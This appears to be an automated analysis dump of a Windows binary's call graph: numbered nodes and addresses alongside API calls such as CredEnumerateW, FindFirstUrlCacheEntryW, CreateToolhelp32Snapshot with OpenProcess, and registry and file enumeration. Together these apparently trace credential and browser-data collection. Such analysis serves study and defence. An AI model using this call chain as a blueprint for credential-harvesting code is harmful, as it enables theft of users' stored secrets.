38043->38044 38044->37957 38046 40a93d 38045->38046 38046->38044 38048 409a41 38047->38048 38049 4099fb malloc 38047->38049 38048->37957 38051 409a37 38049->38051 38052 409a1c 38049->38052 38051->37957 38053 409a30 free 38052->38053 38054 409a20 memcpy 38052->38054 38053->38051 38054->38053 38056 40a9e7 38055->38056 38057 40a9dc free 38055->38057 38059 4099f4 3 API calls 38056->38059 38058 40a9f2 38057->38058 38058->37963 38059->38058 38084 409bca GetModuleFileNameW 38060->38084 38062 40dce6 wcsrchr 38063 40dcf5 38062->38063 38064 40dcf9 wcscat 38062->38064 38063->38064 38064->37970 38085 44db70 38065->38085 38069 40dbfd 38088 4447d9 38069->38088 38072 40dc34 wcscpy wcscpy 38114 40d6f5 38072->38114 38073 40dc1f wcscpy 38073->38072 38076 40d6f5 3 API calls 38077 40dc73 38076->38077 38078 40d6f5 3 API calls 38077->38078 38079 40dc89 38078->38079 38080 40d6f5 3 API calls 38079->38080 38081 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38080->38081 38120 40da80 38081->38120 38084->38062 38086 40dbb4 memset memset 38085->38086 38087 409bca GetModuleFileNameW 38086->38087 38087->38069 38090 4447f4 38088->38090 38089 40dc1b 38089->38072 38089->38073 38090->38089 38091 444807 ??2@YAPAXI 38090->38091 38092 44481f 38091->38092 38093 444873 _snwprintf 38092->38093 38094 4448ab wcscpy 38092->38094 38127 44474a 8 API calls 38093->38127 38096 4448bb 38094->38096 38128 44474a 8 API calls 38096->38128 38097 4448a7 38097->38094 38097->38096 38099 4448cd 38129 44474a 8 API calls 38099->38129 38101 4448e2 38130 44474a 8 API calls 38101->38130 38103 4448f7 38131 44474a 8 API calls 38103->38131 38105 44490c 38132 44474a 8 API calls 38105->38132 38107 444921 38133 44474a 8 API calls 38107->38133 38109 444936 38134 44474a 8 API calls 38109->38134 38111 44494b 38135 44474a 8 API calls 38111->38135 38113 444960 ??3@YAXPAX 38113->38089 38115 44db70 38114->38115 38116 40d702 memset GetPrivateProfileStringW 38115->38116 38117 40d752 38116->38117 38118 40d75c WritePrivateProfileStringW 38116->38118 38117->38118 38119 40d758 38117->38119 38118->38119 38119->38076 38121 44db70 38120->38121 38122 40da8d memset 38121->38122 38123 40daac LoadStringW 38122->38123 38124 40dac6 38123->38124 38124->38123 38126 40dade 38124->38126 38136 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38124->38136 38126->37898 38127->38097 38128->38099 38129->38101 38130->38103 38131->38105 38132->38107 38133->38109 38134->38111 38135->38113 38136->38124 38147 409b98 GetFileAttributesW 38137->38147 38139 40daea 38140 40db63 38139->38140 38141 40daef wcscpy wcscpy GetPrivateProfileIntW 38139->38141 38140->37900 38148 40d65d GetPrivateProfileStringW 38141->38148 38143 40db3e 38149 40d65d GetPrivateProfileStringW 38143->38149 38145 40db4f 38150 40d65d GetPrivateProfileStringW 38145->38150 38147->38139 38148->38143 38149->38145 38150->38140 38186 40eaff 38151->38186 38155 411ae2 memset 38154->38155 38156 411b8f 38154->38156 38226 409bca GetModuleFileNameW 38155->38226 38168 411a8b 38156->38168 38158 411b0a wcsrchr 38159 411b22 wcscat 38158->38159 38160 411b1f 38158->38160 38227 414770 wcscpy wcscpy wcscpy CloseHandle 38159->38227 38160->38159 38162 411b67 38228 402afb 38162->38228 38166 411b7f 38284 40ea13 SendMessageW memset SendMessageW 38166->38284 38169 402afb 27 API calls 38168->38169 38170 411ac0 38169->38170 38171 4110dc 38170->38171 38172 41113e 38171->38172 38177 4110f0 38171->38177 38309 40969c LoadCursorW SetCursor 38172->38309 38174 411143 38310 4032b4 38174->38310 38328 444a54 38174->38328 38175 4110f7 _wcsicmp 38175->38177 38176 411157 38178 40ada2 _wcsicmp 38176->38178 38177->38172 38177->38175 38331 410c46 10 API calls 38177->38331 38181 411167 38178->38181 38179 4111af 38181->38179 38182 4111a6 qsort 38181->38182 38182->38179 38185->37982 38187 40eb10 38186->38187 38199 40e8e0 38187->38199 38190 40eb6c memcpy memcpy 38193 40ebb7 38190->38193 38191 40d134 16 API calls 38191->38193 38192 40ebf2 ??2@YAPAXI ??2@YAPAXI 38194 40ec2e ??2@YAPAXI 38192->38194 38197 40ec65 38192->38197 38193->38190 38193->38191 38193->38192 38194->38197 38209 40ea7f 38197->38209 38198 402f49 38198->37982 38200 40e8f2 38199->38200 38201 40e8eb ??3@YAXPAX 38199->38201 38202 40e900 38200->38202 38203 40e8f9 ??3@YAXPAX 38200->38203 38201->38200 38204 40e90a ??3@YAXPAX 38202->38204 38206 40e911 38202->38206 38203->38202 38204->38206 38205 40e931 ??2@YAPAXI ??2@YAPAXI 38205->38190 38206->38205 38207 40e921 ??3@YAXPAX 38206->38207 38208 40e92a ??3@YAXPAX 38206->38208 38207->38208 38208->38205 38210 40aa04 free 38209->38210 38211 40ea88 38210->38211 38212 40aa04 free 38211->38212 38213 40ea90 38212->38213 38214 40aa04 free 38213->38214 38215 40ea98 38214->38215 38216 40aa04 free 38215->38216 38217 40eaa0 38216->38217 38218 40a9ce 4 API calls 38217->38218 38219 40eab3 38218->38219 38220 40a9ce 4 API calls 38219->38220 38221 40eabd 38220->38221 38222 40a9ce 4 API calls 38221->38222 38223 40eac7 38222->38223 38224 40a9ce 4 API calls 38223->38224 38225 40ead1 38224->38225 38225->38198 38226->38158 38227->38162 38285 40b2cc 38228->38285 38230 402b0a 38231 40b2cc 27 API calls 38230->38231 38232 402b23 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402b3a 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402b54 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402b6b 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402b82 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402b99 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402bb0 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402bc7 38245->38246 38247 40b2cc 27 API calls 38246->38247 38248 402bde 38247->38248 38249 40b2cc 27 API calls 38248->38249 38250 402bf5 38249->38250 38251 40b2cc 27 API calls 38250->38251 38252 402c0c 38251->38252 38253 40b2cc 27 API calls 38252->38253 38254 402c23 38253->38254 38255 40b2cc 27 API calls 38254->38255 38256 402c3a 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402c51 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402c68 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402c7f 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402c99 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402cb3 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402cd5 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402cf0 38269->38270 38271 40b2cc 27 API calls 38270->38271 38272 402d0b 38271->38272 38273 40b2cc 27 API calls 38272->38273 38274 402d26 38273->38274 38275 40b2cc 27 API calls 38274->38275 38276 402d3e 38275->38276 38277 40b2cc 27 API calls 38276->38277 38278 402d59 38277->38278 38279 40b2cc 27 API calls 38278->38279 38280 402d78 38279->38280 38281 40b2cc 27 API calls 38280->38281 38282 402d93 38281->38282 38283 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38282->38283 38283->38166 38284->38156 38288 40b58d 38285->38288 38287 40b2d1 38287->38230 38289 40b5a4 GetModuleHandleW FindResourceW 38288->38289 38290 40b62e 38288->38290 38291 40b5c2 LoadResource 38289->38291 38293 40b5e7 38289->38293 38290->38287 38292 40b5d0 SizeofResource LockResource 38291->38292 38291->38293 38292->38293 38293->38290 38301 40afcf 38293->38301 38295 40b608 memcpy 38304 40b4d3 memcpy 38295->38304 38297 40b61e 38305 40b3c1 18 API calls 38297->38305 38299 40b626 38306 40b04b 38299->38306 38302 40b04b ??3@YAXPAX 38301->38302 38303 40afd7 ??2@YAPAXI 38302->38303 38303->38295 38304->38297 38305->38299 38307 40b051 ??3@YAXPAX 38306->38307 38308 40b05f 38306->38308 38307->38308 38308->38290 38309->38174 38311 4032c4 38310->38311 38312 40b633 free 38311->38312 38313 403316 38312->38313 38332 44553b 38313->38332 38317 403480 38530 40368c 15 API calls 38317->38530 38319 403489 38320 40b633 free 38319->38320 38321 403495 38320->38321 38321->38176 38322 4033a9 memset memcpy 38323 4033ec wcscmp 38322->38323 38324 40333c 38322->38324 38323->38324 38324->38317 38324->38322 38324->38323 38528 4028e7 11 API calls 38324->38528 38529 40f508 6 API calls 38324->38529 38327 403421 _wcsicmp 38327->38324 38329 444a64 FreeLibrary 38328->38329 38330 444a83 38328->38330 38329->38330 38330->38176 38331->38177 38333 445548 38332->38333 38334 445599 38333->38334 38531 40c768 38333->38531 38335 4455a8 memset 38334->38335 38343 4457f2 38334->38343 38614 403988 38335->38614 38341 4455e5 38356 445672 38341->38356 38361 44560f 38341->38361 38346 445854 38343->38346 38716 403e2d memset memset memset memset memset 38343->38716 38344 4458bb memset memset 38348 414c2e 15 API calls 38344->38348 38390 4458aa 38346->38390 38739 403c9c memset memset memset memset memset 38346->38739 38347 44595e memset memset 38351 414c2e 15 API calls 38347->38351 38352 4458f9 38348->38352 38350 445a00 memset memset 38762 414c2e 38350->38762 38359 44599c 38351->38359 38360 40b2cc 27 API calls 38352->38360 38353 44558c 38598 444b06 38353->38598 38354 44557a 38354->38353 38811 4136c0 CoTaskMemFree 38354->38811 38625 403fbe memset memset memset memset memset 38356->38625 38369 40b2cc 27 API calls 38359->38369 38370 445909 38360->38370 38372 4087b3 337 API calls 38361->38372 38363 445bca 38371 445c8b memset memset 38363->38371 38427 445cf0 38363->38427 38364 445b38 memset memset memset 38375 445bd4 38364->38375 38376 445b98 38364->38376 38365 445849 38827 40b1ab free free 38365->38827 38384 4459ac 38369->38384 38381 409d1f 6 API calls 38370->38381 38385 414c2e 15 API calls 38371->38385 38382 445621 38372->38382 38373 445585 38812 41366b FreeLibrary 38373->38812 38374 44589f 38828 40b1ab free free 38374->38828 38379 414c2e 15 API calls 38375->38379 38376->38375 38387 445ba2 38376->38387 38377 40b2cc 27 API calls 38389 445a4f 38377->38389 38392 445be2 38379->38392 38380 403335 38527 4452e5 45 API calls 38380->38527 38395 445919 38381->38395 38813 4454bf 20 API calls 38382->38813 38383 445823 38383->38365 38405 4087b3 337 API calls 38383->38405 38396 409d1f 6 API calls 38384->38396 38397 445cc9 38385->38397 38898 4099c6 wcslen 38387->38898 38388 4456b2 38815 40b1ab free free 38388->38815 38777 409d1f wcslen wcslen 38389->38777 38390->38344 38424 44594a 38390->38424 38403 40b2cc 27 API calls 38392->38403 38393 445d3d 38423 40b2cc 27 API calls 38393->38423 38394 445d88 memset memset memset 38406 414c2e 15 API calls 38394->38406 38829 409b98 GetFileAttributesW 38395->38829 38407 4459bc 38396->38407 38408 409d1f 6 API calls 38397->38408 38398 445879 38398->38374 38409 4087b3 337 API calls 38398->38409 38400 445bb3 38901 445403 memset 38400->38901 38401 445680 38401->38388 38648 4087b3 memset 38401->38648 38412 445bf3 38403->38412 38405->38383 38415 445dde 38406->38415 38894 409b98 GetFileAttributesW 38407->38894 38417 445ce1 38408->38417 38409->38398 38422 409d1f 6 API calls 38412->38422 38413 445928 38413->38424 38830 40b6ef 38413->38830 38425 40b2cc 27 API calls 38415->38425 38918 409b98 GetFileAttributesW 38417->38918 38421 40b2cc 27 API calls 38429 445a94 38421->38429 38431 445c07 38422->38431 38432 445d54 _wcsicmp 38423->38432 38424->38347 38436 4459ed 38424->38436 38435 445def 38425->38435 38426 4459cb 38426->38436 38443 40b6ef 249 API calls 38426->38443 38427->38380 38427->38393 38427->38394 38428 445389 255 API calls 38428->38363 38782 40ae18 38429->38782 38430 44566d 38430->38343 38699 413d4c 38430->38699 38439 445389 255 API calls 38431->38439 38440 445d71 38432->38440 38504 445d67 38432->38504 38434 445665 38814 40b1ab free free 38434->38814 38441 409d1f 6 API calls 38435->38441 38436->38350 38477 445b22 38436->38477 38445 445c17 38439->38445 38919 445093 23 API calls 38440->38919 38448 445e03 38441->38448 38443->38436 38444 4456d8 38450 40b2cc 27 API calls 38444->38450 38451 40b2cc 27 API calls 38445->38451 38447 44563c 38447->38434 38453 4087b3 337 API calls 38447->38453 38920 409b98 GetFileAttributesW 38448->38920 38449 40b6ef 249 API calls 38449->38380 38455 4456e2 38450->38455 38456 445c23 38451->38456 38452 445d83 38452->38380 38453->38447 38816 413fa6 _wcsicmp _wcsicmp 38455->38816 38460 409d1f 6 API calls 38456->38460 38458 445e12 38465 445e6b 38458->38465 38472 40b2cc 27 API calls 38458->38472 38463 445c37 38460->38463 38461 445aa1 38464 445b17 38461->38464 38481 445ab2 memset 38461->38481 38495 409d1f 6 API calls 38461->38495 38789 40add4 38461->38789 38794 445389 38461->38794 38803 40ae51 38461->38803 38462 4456eb 38468 4456fd memset memset memset memset 38462->38468 38469 4457ea 38462->38469 38470 445389 255 API calls 38463->38470 38895 40aebe 38464->38895 38922 445093 23 API calls 38465->38922 38817 409c70 wcscpy wcsrchr 38468->38817 38820 413d29 38469->38820 38476 445c47 38470->38476 38478 445e33 38472->38478 38474 445e7e 38480 445f67 38474->38480 38483 40b2cc 27 API calls 38476->38483 38477->38363 38477->38364 38479 409d1f 6 API calls 38478->38479 38484 445e47 38479->38484 38485 40b2cc 27 API calls 38480->38485 38486 40b2cc 27 API calls 38481->38486 38488 445c53 38483->38488 38921 409b98 GetFileAttributesW 38484->38921 38490 445f73 38485->38490 38486->38461 38487 409c70 2 API calls 38491 44577e 38487->38491 38492 409d1f 6 API calls 38488->38492 38494 409d1f 6 API calls 38490->38494 38496 409c70 2 API calls 38491->38496 38497 445c67 38492->38497 38493 445e56 38493->38465 38501 445e83 memset 38493->38501 38498 445f87 38494->38498 38495->38461 38499 44578d 38496->38499 38500 445389 255 API calls 38497->38500 38925 409b98 GetFileAttributesW 38498->38925 38499->38469 38506 40b2cc 27 API calls 38499->38506 38500->38363 38505 40b2cc 27 API calls 38501->38505 38504->38380 38504->38449 38507 445eab 38505->38507 38508 4457a8 38506->38508 38509 409d1f 6 API calls 38507->38509 38510 409d1f 6 API calls 38508->38510 38511 445ebf 38509->38511 38512 4457b8 38510->38512 38513 40ae18 9 API calls 38511->38513 38819 409b98 GetFileAttributesW 38512->38819 38523 445ef5 38513->38523 38515 4457c7 38515->38469 38516 4087b3 337 API calls 38515->38516 38516->38469 38517 40ae51 9 API calls 38517->38523 38518 445f5c 38519 40aebe FindClose 38518->38519 38519->38480 38520 40add4 2 API calls 38520->38523 38521 40b2cc 27 API calls 38521->38523 38522 409d1f 6 API calls 38522->38523 38523->38517 38523->38518 38523->38520 38523->38521 38523->38522 38525 445f3a 38523->38525 38923 409b98 GetFileAttributesW 38523->38923 38924 445093 23 API calls 38525->38924 38527->38324 38528->38327 38529->38324 38530->38319 38532 40c775 38531->38532 38926 40b1ab free free 38532->38926 38534 40c788 38927 40b1ab free free 38534->38927 38536 40c790 38928 40b1ab free free 38536->38928 38538 40c798 38539 40aa04 free 38538->38539 38540 40c7a0 38539->38540 38929 40c274 memset 38540->38929 38545 40a8ab 9 API calls 38546 40c7c3 38545->38546 38547 40a8ab 9 API calls 38546->38547 38548 40c7d0 38547->38548 38958 40c3c3 38548->38958 38552 40c7e5 38553 40c877 38552->38553 38554 40c86c 38552->38554 38560 40c634 49 API calls 38552->38560 38983 40a706 38552->38983 38561 40bdb0 38553->38561 39000 4053fe 39 API calls 38554->39000 38560->38552 39168 404363 38561->39168 38564 40bf5d 39188 40440c 38564->39188 38566 40bdee 38566->38564 38569 40b2cc 27 API calls 38566->38569 38567 40bddf CredEnumerateW 38567->38566 38570 40be02 wcslen 38569->38570 38570->38564 38577 40be1e 38570->38577 38571 40be26 wcsncmp 38571->38577 38574 40be7d memset 38575 40bea7 memcpy 38574->38575 38574->38577 38576 40bf11 wcschr 38575->38576 38575->38577 38576->38577 38577->38564 38577->38571 38577->38574 38577->38575 38577->38576 38578 40b2cc 27 API calls 38577->38578 38580 40bf43 LocalFree 38577->38580 39191 40bd5d 28 API calls 38577->39191 39192 404423 38577->39192 38579 40bef6 _wcsnicmp 38578->38579 38579->38576 38579->38577 38580->38577 38581 4135f7 39205 4135e0 38581->39205 38584 40b2cc 27 API calls 38585 41360d 38584->38585 38586 40a804 8 API calls 38585->38586 38587 413613 38586->38587 38588 41361b 38587->38588 38589 41363e 38587->38589 38591 40b273 27 API calls 38588->38591 38590 4135e0 FreeLibrary 38589->38590 38592 413643 38590->38592 38593 413625 GetProcAddress 38591->38593 38592->38354 38593->38589 38594 413648 38593->38594 38595 413658 38594->38595 38596 4135e0 FreeLibrary 38594->38596 38595->38354 38597 413666 38596->38597 38597->38354 39208 4449b9 38598->39208 38601 444c1f 38601->38334 38602 4449b9 42 API calls 38604 444b4b 38602->38604 38603 444c15 38605 4449b9 42 API calls 38603->38605 38604->38603 39229 444972 GetVersionExW 38604->39229 38605->38601 38607 444b99 memcmp 38612 444b8c 38607->38612 38608 444c0b 39233 444a85 42 API calls 38608->39233 38612->38607 38612->38608 39230 444aa5 42 API calls 38612->39230 39231 40a7a0 GetVersionExW 38612->39231 39232 444a85 42 API calls 38612->39232 38615 40399d 38614->38615 39234 403a16 38615->39234 38617 403a09 39248 40b1ab free free 38617->39248 38619 4039a3 38619->38617 38623 4039f4 38619->38623 39245 40a02c CreateFileW 38619->39245 38620 403a12 wcsrchr 38620->38341 38623->38617 38624 4099c6 2 API calls 38623->38624 38624->38617 38626 414c2e 15 API calls 38625->38626 38627 404048 38626->38627 38628 414c2e 15 API calls 38627->38628 38629 404056 38628->38629 38630 409d1f 6 API calls 38629->38630 38631 404073 38630->38631 38632 409d1f 6 API calls 38631->38632 38633 40408e 38632->38633 38634 409d1f 6 API calls 38633->38634 38635 4040a6 38634->38635 38636 403af5 20 API calls 38635->38636 38637 4040ba 38636->38637 38638 403af5 20 API calls 38637->38638 38639 4040cb 38638->38639 39275 40414f memset 38639->39275 38641 4040e0 38642 404140 38641->38642 38644 4040ec memset 38641->38644 38646 4099c6 2 API calls 38641->38646 38647 40a8ab 9 API calls 38641->38647 39289 40b1ab free free 38642->39289 38644->38641 38645 404148 38645->38401 38646->38641 38647->38641 39302 40a6e6 WideCharToMultiByte 38648->39302 38650 4087ed 39303 4095d9 memset 38650->39303 38653 408809 memset memset memset memset memset 38654 40b2cc 27 API calls 38653->38654 38655 4088a1 38654->38655 38656 409d1f 6 API calls 38655->38656 38657 4088b1 38656->38657 38658 40b2cc 27 API calls 38657->38658 38659 4088c0 38658->38659 38660 409d1f 6 API calls 38659->38660 38661 4088d0 38660->38661 38662 40b2cc 27 API calls 38661->38662 38663 4088df 38662->38663 38664 409d1f 6 API calls 38663->38664 38665 4088ef 38664->38665 38666 40b2cc 27 API calls 38665->38666 38667 4088fe 38666->38667 38668 409d1f 6 API calls 38667->38668 38669 40890e 38668->38669 38670 40b2cc 27 API calls 38669->38670 38671 40891d 38670->38671 38672 409d1f 6 API calls 38671->38672 38673 40892d 38672->38673 39322 409b98 GetFileAttributesW 38673->39322 38675 40893e 38698 408953 38698->38401 38700 40b633 free 38699->38700 38701 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38700->38701 38702 413f00 Process32NextW 38701->38702 38703 413da5 OpenProcess 38702->38703 38704 413f17 CloseHandle 38702->38704 38705 413df3 memset 38703->38705 38708 413eb0 38703->38708 38704->38444 39614 413f27 38705->39614 38707 413ebf free 38707->38708 38708->38702 38708->38707 38709 4099f4 3 API calls 38708->38709 38709->38708 38711 413e37 GetModuleHandleW 38712 413e1f 38711->38712 38713 413e46 GetProcAddress 38711->38713 38712->38711 39619 413959 38712->39619 39635 413ca4 38712->39635 38713->38712 38715 413ea2 CloseHandle 38715->38708 38717 414c2e 15 API calls 38716->38717 38718 403eb7 38717->38718 38719 414c2e 15 API calls 38718->38719 38720 403ec5 38719->38720 38721 409d1f 6 API calls 38720->38721 38722 403ee2 38721->38722 38723 409d1f 6 API calls 38722->38723 38724 403efd 38723->38724 38725 409d1f 6 API calls 38724->38725 38726 403f15 38725->38726 38727 403af5 20 API calls 38726->38727 38728 403f29 38727->38728 38729 403af5 20 API calls 38728->38729 38730 403f3a 38729->38730 38731 40414f 33 API calls 38730->38731 38732 403f4f 38731->38732 38733 403faf 38732->38733 38735 403f5b memset 38732->38735 38737 4099c6 2 API calls 38732->38737 38738 40a8ab 9 API calls 38732->38738 39649 40b1ab free free 38733->39649 38735->38732 38736 403fb7 38736->38383 38737->38732 38738->38732 38740 414c2e 15 API calls 38739->38740 38741 403d26 38740->38741 38742 414c2e 15 API calls 38741->38742 38743 403d34 38742->38743 38744 409d1f 6 API calls 38743->38744 38745 403d51 38744->38745 38746 409d1f 6 API calls 38745->38746 38747 403d6c 38746->38747 38748 409d1f 6 API calls 38747->38748 38749 403d84 38748->38749 38750 403af5 20 API calls 38749->38750 38751 403d98 38750->38751 38752 403af5 20 API calls 38751->38752 38753 403da9 38752->38753 38754 40414f 33 API calls 38753->38754 38760 403dbe 38754->38760 38755 403e1e 39650 40b1ab free free 38755->39650 38756 403dca memset 38756->38760 38758 403e26 38758->38398 38759 4099c6 2 API calls 38759->38760 38760->38755 38760->38756 38760->38759 38761 40a8ab 9 API calls 38760->38761 38761->38760 38763 414b81 9 API calls 38762->38763 38764 414c40 38763->38764 38765 414c73 memset 38764->38765 39651 409cea 38764->39651 38766 414c94 38765->38766 39654 414592 RegOpenKeyExW 38766->39654 38770 414c64 38770->38377 38771 414cc1 38772 414cf4 wcscpy 38771->38772 39655 414bb0 wcscpy 38771->39655 38772->38770 38774 414cd2 39656 4145ac RegQueryValueExW 38774->39656 38776 414ce9 38776->38772 38778 409d43 wcscpy 38777->38778 38780 409d62 38777->38780 38779 409719 2 API calls 38778->38779 38781 409d51 wcscat 38779->38781 38780->38421 38781->38780 38783 40aebe FindClose 38782->38783 38784 40ae21 38783->38784 38785 4099c6 2 API calls 38784->38785 38786 40ae35 38785->38786 38787 409d1f 6 API calls 38786->38787 38788 40ae49 38787->38788 38788->38461 38790 40ade0 38789->38790 38791 40ae0f 38789->38791 38790->38791 38792 40ade7 wcscmp 38790->38792 38791->38461 38792->38791 38793 40adfe wcscmp 38792->38793 38793->38791 38795 40ae18 9 API calls 38794->38795 38797 4453c4 38795->38797 38796 40ae51 9 API calls 38796->38797 38797->38796 38798 4453f3 38797->38798 38799 40add4 2 API calls 38797->38799 38802 445403 250 API calls 38797->38802 38800 40aebe FindClose 38798->38800 38799->38797 38801 4453fe 38800->38801 38801->38461 38802->38797 38804 40ae7b FindNextFileW 38803->38804 38805 40ae5c FindFirstFileW 38803->38805 38806 40ae94 38804->38806 38807 40ae8f 38804->38807 38805->38806 38809 40aeb6 38806->38809 38810 409d1f 6 API calls 38806->38810 38808 40aebe FindClose 38807->38808 38808->38806 38809->38461 38810->38809 38811->38373 38812->38353 38813->38447 38814->38430 38815->38430 38816->38462 38818 409c89 38817->38818 38818->38487 38819->38515 38821 413d39 38820->38821 38822 413d2f FreeLibrary 38820->38822 38823 40b633 free 38821->38823 38822->38821 38824 413d42 38823->38824 38825 40b633 free 38824->38825 38826 413d4a 38825->38826 38826->38343 38827->38346 38828->38390 38829->38413 38831 44db70 38830->38831 38832 40b6fc memset 38831->38832 38833 409c70 2 API calls 38832->38833 38834 40b732 wcsrchr 38833->38834 38835 40b743 38834->38835 38836 40b746 memset 38834->38836 38835->38836 38837 40b2cc 27 API calls 38836->38837 38838 40b76f 38837->38838 38839 409d1f 6 API calls 38838->38839 38840 40b783 38839->38840 39657 409b98 GetFileAttributesW 38840->39657 38842 40b792 38843 40b7c2 38842->38843 38845 409c70 2 API calls 38842->38845 39658 40bb98 38843->39658 38847 40b7a5 38845->38847 38850 40b2cc 27 API calls 38847->38850 38848 40b837 CloseHandle 38852 40b83e memset 38848->38852 38849 40b817 39692 409a45 GetTempPathW 38849->39692 38853 40b7b2 38850->38853 39691 40a6e6 WideCharToMultiByte 38852->39691 38856 409d1f 6 API calls 38853->38856 38854 40b827 38854->38852 38856->38843 38857 40b866 38858 444432 120 API calls 38857->38858 38859 40b879 38858->38859 38860 40b273 27 API calls 38859->38860 38861 40bad5 38859->38861 38862 40b89a 38860->38862 38863 40b04b ??3@YAXPAX 38861->38863 38864 438552 133 API calls 38862->38864 38865 40baf3 38863->38865 38866 40b8a4 38864->38866 38865->38424 38867 40bacd 38866->38867 38869 4251c4 136 API calls 38866->38869 38868 443d90 110 API calls 38867->38868 38868->38861 38892 40b8b8 38869->38892 38870 40bac6 39704 424f26 122 API calls 38870->39704 38871 40b8bd memset 39695 425413 17 API calls 38871->39695 38874 425413 17 API calls 38874->38892 38877 40a71b MultiByteToWideChar 38877->38892 38878 40a734 MultiByteToWideChar 38878->38892 38881 40b9b5 memcmp 38881->38892 38882 4099c6 2 API calls 38882->38892 38883 404423 37 API calls 38883->38892 38886 4251c4 136 API calls 38886->38892 38887 40bb3e memset memcpy 39705 40a734 MultiByteToWideChar 38887->39705 38889 40bb88 LocalFree 38889->38892 38892->38870 38892->38871 38892->38874 38892->38877 38892->38878 38892->38881 38892->38882 38892->38883 38892->38886 38892->38887 38893 40ba5f memcmp 38892->38893 39696 4253ef 16 API calls 38892->39696 39697 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38892->39697 39698 4253af 17 API calls 38892->39698 39699 4253cf 17 API calls 38892->39699 39700 447280 memset 38892->39700 39701 447960 memset memcpy memcpy memcpy 38892->39701 39702 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38892->39702 39703 447920 memcpy memcpy memcpy 38892->39703 38893->38892 38894->38426 38896 40aed1 38895->38896 38897 40aec7 FindClose 38895->38897 38896->38477 38897->38896 38899 4099d7 38898->38899 38900 4099da memcpy 38898->38900 38899->38900 38900->38400 38902 40b2cc 27 API calls 38901->38902 38903 44543f 38902->38903 38904 409d1f 6 API calls 38903->38904 38905 44544f 38904->38905 39797 409b98 GetFileAttributesW 38905->39797 38907 44545e 38908 445476 38907->38908 38910 40b6ef 249 API calls 38907->38910 38909 40b2cc 27 API calls 38908->38909 38911 445482 38909->38911 38910->38908 38912 409d1f 6 API calls 38911->38912 38913 445492 38912->38913 39798 409b98 GetFileAttributesW 38913->39798 38915 4454a1 38916 4454b9 38915->38916 38917 40b6ef 249 API calls 38915->38917 38916->38428 38917->38916 38918->38427 38919->38452 38920->38458 38921->38493 38922->38474 38923->38523 38924->38523 38925->38504 38926->38534 38927->38536 38928->38538 38930 414c2e 15 API calls 38929->38930 38931 40c2ae 38930->38931 39001 40c1d3 38931->39001 38936 40c3be 38953 40a8ab 38936->38953 38937 40afcf 2 API calls 38938 40c2fd FindFirstUrlCacheEntryW 38937->38938 38939 40c3b6 38938->38939 38940 40c31e wcschr 38938->38940 38941 40b04b ??3@YAXPAX 38939->38941 38942 40c331 38940->38942 38943 40c35e FindNextUrlCacheEntryW 38940->38943 38941->38936 38945 40a8ab 9 API calls 38942->38945 38943->38940 38944 40c373 GetLastError 38943->38944 38946 40c3ad FindCloseUrlCache 38944->38946 38947 40c37e 38944->38947 38948 40c33e wcschr 38945->38948 38946->38939 38949 40afcf 2 API calls 38947->38949 38948->38943 38950 40c34f 38948->38950 38951 40c391 FindNextUrlCacheEntryW 38949->38951 38952 40a8ab 9 API calls 38950->38952 38951->38940 38951->38946 38952->38943 39095 40a97a 38953->39095 38956 40a8cc 38956->38545 38957 40a8d0 7 API calls 38957->38956 39100 40b1ab free free 38958->39100 38960 40c3dd 38961 40b2cc 27 API calls 38960->38961 38962 40c3e7 38961->38962 39101 414592 RegOpenKeyExW 38962->39101 38964 40c3f4 38965 40c50e 38964->38965 38966 40c3ff 38964->38966 38980 405337 38965->38980 38967 40a9ce 4 API calls 38966->38967 38968 40c418 memset 38967->38968 39102 40aa1d 38968->39102 38971 40c471 38973 40c47a _wcsupr 38971->38973 38972 40c505 38972->38965 38974 40a8d0 7 API calls 38973->38974 38975 40c498 38974->38975 38976 40a8d0 7 API calls 38975->38976 38977 40c4ac memset 38976->38977 38978 40aa1d 38977->38978 38979 40c4e4 RegEnumValueW 38978->38979 38979->38972 38979->38973 39104 405220 38980->39104 38984 4099c6 2 API calls 38983->38984 38985 40a714 _wcslwr 38984->38985 38986 40c634 38985->38986 39161 405361 38986->39161 38989 40c65c wcslen 39164 4053b6 39 API calls 38989->39164 38990 40c71d wcslen 38990->38552 38992 40c677 38993 40c713 38992->38993 39165 40538b 39 API calls 38992->39165 39167 4053df 39 API calls 38993->39167 38996 40c6a5 38996->38993 38997 40c6a9 memset 38996->38997 38998 40c6d3 38997->38998 39166 40c589 43 API calls 38998->39166 39000->38553 39002 40ae18 9 API calls 39001->39002 39008 40c210 39002->39008 39003 40ae51 9 API calls 39003->39008 39004 40c264 39005 40aebe FindClose 39004->39005 39007 40c26f 39005->39007 39006 40add4 2 API calls 39006->39008 39013 40e5ed memset memset 39007->39013 39008->39003 39008->39004 39008->39006 39009 40c231 _wcsicmp 39008->39009 39010 40c1d3 34 API calls 39008->39010 39009->39008 39011 40c248 39009->39011 39010->39008 39026 40c084 21 API calls 39011->39026 39014 414c2e 15 API calls 39013->39014 39015 40e63f 39014->39015 39016 409d1f 6 API calls 39015->39016 39017 40e658 39016->39017 39027 409b98 GetFileAttributesW 39017->39027 39019 40e667 39020 409d1f 6 API calls 39019->39020 39022 40e680 39019->39022 39020->39022 39028 409b98 GetFileAttributesW 39022->39028 39023 40e68f 39024 40c2d8 39023->39024 39029 40e4b2 39023->39029 39024->38936 39024->38937 39026->39008 39027->39019 39028->39023 39050 40e01e 39029->39050 39031 40e593 39032 40e5b0 39031->39032 39033 40e59c DeleteFileW 39031->39033 39034 40b04b ??3@YAXPAX 39032->39034 39033->39032 39036 